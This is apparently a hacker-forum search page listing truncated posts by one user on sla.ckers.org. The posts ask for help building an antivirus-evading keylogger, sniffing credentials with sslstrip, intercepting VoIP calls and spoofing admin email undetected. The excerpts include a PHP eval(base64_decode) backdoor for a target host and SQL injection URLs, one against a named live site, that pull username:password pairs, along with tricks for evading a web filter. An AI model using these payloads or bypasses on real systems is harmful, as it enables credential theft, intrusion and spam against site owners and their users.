Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Ways to stop spam, detect robotic activity, and actually harm the spam trade, as well as how it works, how to circumvent filters, etc. 

Current Page: 1 of 1
Results 1 - 15 of 15
2 years ago
lazer
I'm planning to write/code one such stealth keylogger that would bypass detection by a certain antivirus. I don't want to just download any keylogger from internet and try to encode it to evade detection. Writing code myself I would have the ability to make changes as I go; obscuration on both high-level and low-level language. I like control too. It seems naive but is it true that keylogger
Forum: Obfuscation
2 years ago
lazer
a more generous discussion is being followed on here http://security.stackexchange.com/questions/10989/how-to-thwart-sslstrip-attack I feel the change in fingerprint and also to say mismatch public cert creates a second fingerprint a HASH value which is different when its compared using this second public certficate. Its not a rogue but its just another copy of the server public cert sent via
Forum: CSRF and Session Info
2 years ago
lazer
Well its not me who said anything about the rogue stuff. Its the author himself.You can check the link over here. www.obnosis.com/SSLstrip.ppt Or i'm just confused about the whole stuff.
Forum: CSRF and Session Info
2 years ago
lazer
I need help understand the dynamics of sslstrip attack against ssl certs. I'm using it test the security of a site which is in my ownership. I can successfully sniff the vicitim credentials over the internet but when the same attack happens over the in case of gmail or live msn i get no stuff back its completely static in that case. Does it means their ssl is secure and mine is not? Like the ro
Forum: CSRF and Session Info
2 years ago
lazer
I need help I work as sec analyst for a notable company in my country. I'm currently in the activity of assessing VOIP setup. I'm using Application-Level Interception Techniques to test the setup weakness. The tool i'm using to conduct interception level attack is sip_rogue. Sip_rogue is included in bt4. The attack allows you as attacker to listen the conversation occurring between sip phones. The
Forum: Mobile Devices
2 years ago
lazer
Hey I want some help in executing this exploit. I'm stuck:( In reference to exploit described in URL. 1337day.com/exploits/6543 <?php /* put this one on target hosting */ if ( ! $data = @getenv('HTTP_ACCEPT_LANGUAGE')) $data = $_SERVER['HTTP_ACCEPT_LANGUAGE']; if ( ! preg_match('#^*={0,2}$#', $data)) die('no propety data'); eval(base64_decode($data)); ?> The exploit
Forum: DoS
2 years ago
lazer
sh3llm4n Wrote: ------------------------------------------------------- > Its just a trick that i have learnt from a > friend... > Take a look at this target: > > http://cleopatra-sy.com/index.php?content=more_pro > duct&id=-17/*!union*/+select+1,concat_ws(0x7c,vers > ion(),database(),user()),3,4,5,6--+- > > Ok? > What did you C? > yes.. '500 inte
Forum: SQL and Code Injection
2 years ago
lazer
sh3llm4n Wrote: ------------------------------------------------------- > Did you use buffer overflow? > use "(select 1)=(select > 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > AAAAAAAAAAAAAAAAAAAAAAA
Forum: SQL and Code Injection
2 years ago
lazer
UPDATE Testing this vul from inside the company network i get different result with my "real-code" in this case not http 500 error. This. is_xmlhttp.php?scriptname=1&department=-99%20UNION%20SELECT%201,2,concat (username,char(58),password),4,5,6,7,8,9%20FROM%20livehelp_users/* output on screen: ( 1064 : You have an error in your SQL syntax; check the manual that correspond
Forum: SQL and Code Injection
2 years ago
lazer
Update I have come with some interesting results that i wanna discuss with fellows users. Case 1 no encoding Input: http://site/chat/is_xmlhttp.php?scriptname=1&amp;department=-99 UNION SELECT 1,2,concat(username,char(58),password),4,5,6,7,8,9 FROM livehelp_users/* Output: Not Found The requested URL /nlh/1_xmlhttp.php was not found on this server. Case 2: with encoding In
Forum: SQL and Code Injection
2 years ago
lazer
Albino Wrote: ------------------------------------------------------- > You need to fingerprint the filter to work out > which characters/words cause the 500. Likely > triggers are 'union', 'select', '/*'... think > inside the box! Yes indeed i was missing the point i would test these var's one by one now. Thanks Albino
Forum: SQL and Code Injection
2 years ago
lazer
PaPPy Wrote: ------------------------------------------------------- > are there any characters the web server is > stripping? > > example: ~ is stripped > un~ion se~lect....etc etc > > i one time saw the word union stripped > so it turned into > UNunionION SELunionECT 1,2,3,4,5 Thanks PaPPy let me work the magic now.
Forum: SQL and Code Injection
2 years ago
lazer
I want to inject the code (realcode) on a vulnerable webpage hosting crafty syntax app. I'm getting Error Code: 500 Internal Server Error. The request was rejected by the HTTP filter. Contact your ISA Server administrator. (12217) . I cannot pass this filter. I have tried numerous filter bypassing techniques but nothing seems to work. I would appreciate your response / help. Thanks.
Forum: SQL and Code Injection
3 years ago
lazer
Thank you ....:D is it possible to write hyperlink code in sendmail program e.g <a href="http://www.goldcoastwebdesigns.com/change-hyperlink-color.shtml">hyperlink color</a> and secondly how could u find list of open-relay server/? DO U have to perform a manual scan or not...
Forum: SPAM
3 years ago
lazer
hey guys this is what i want to do:-(consider me as newbie to entire spoofing / spamming game) i'm not at user of site abc.com but what i plan to do is to use the admin mail of abc website (e.g admin@abc.com) and sent a spoof email to person zyz@abc of the same domain. I want to do this with lowest level of detection possible. Do i have to do an open-relay thing? if yes would it not be detec
Forum: SPAM
Current Page: 1 of 1